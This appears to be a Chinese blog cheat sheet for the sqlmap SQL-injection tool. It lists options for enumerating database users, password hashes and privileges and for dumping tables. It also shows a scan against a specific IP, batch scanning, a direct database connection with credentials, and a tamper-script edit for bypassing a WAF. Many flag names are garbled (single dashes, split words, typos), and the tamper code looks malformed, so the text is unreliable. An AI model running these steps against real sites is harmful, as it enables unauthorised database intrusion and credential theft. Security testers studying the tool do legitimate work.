sqlmap常用命令及使用方法

-d DIRECT 直接连接数据库的连接字符串
-u 目标url
-I 日志文件 从burp或者webScarab代理日志文件中分析目标
-x 网站地图URL 从远程网站地图(sitemap.xml)文件来解析目标
-m 文件 将目标地址保存在文件中,一行一个url地址进行批量检测
-r 请求文件
-c 配置文件 从配置ini文件中加载选项
-o 打开所有的优化开关
-predict -output 预测普通查询输出
-keep -alive 使用持久http连接
-null -connection 获取页面长度
-level 执行测试的等级(1-5,默认1)
-risk 执行测试的风险 (1-3,默认1)
-string 查询有效时在页面匹配字符串
-not -string 查询无效时在页面匹配字符串
-regexp 查询有效时在页面匹配正则表达式
-current -user 获取数据库管理系统当前用户
-current -db 获取数据库管理系统当前数据库
-hosname 获取数据库服务器主机名称
-user 枚举数据库管理系统用户
-passwords 枚举数据库管理系统用户密码哈希
-privileges 枚举数据库管理系统用户的权限
-dbs 枚举数据库管理系统数据库
-tables 枚举DBMS数据库中的表
-columns 枚举DBMS数据库表列
-dump 转储数据库表项

sqlmap自动检测
检测语法 -u http://219.153.49.228:46530/sqlmap/mysql/get_int.php?id=1

批量检测
将目标url搜集并整理为txt文件 然后使用 sqlmap.py -m xxx.txt 注意xxx.txt跟sqlmap在同一个目录下

直接连接数据库
sqlmap.py -d “mysql://admin:[email protected]:3306/testdb” -f -banner -dbs -users

sqlmap实用技巧
mysql的注释方法进行绕过WAF进行SQL注入
修改C:\Python27\sqlmap\tamper\halfversionedmorekeywords.py
return match.group().replace(word,”/!0%s” % word) 为:return match.group().replace(word,”/!50000%s*/” % word)

你可能感兴趣的:(sqlmap常用命令及使用方法)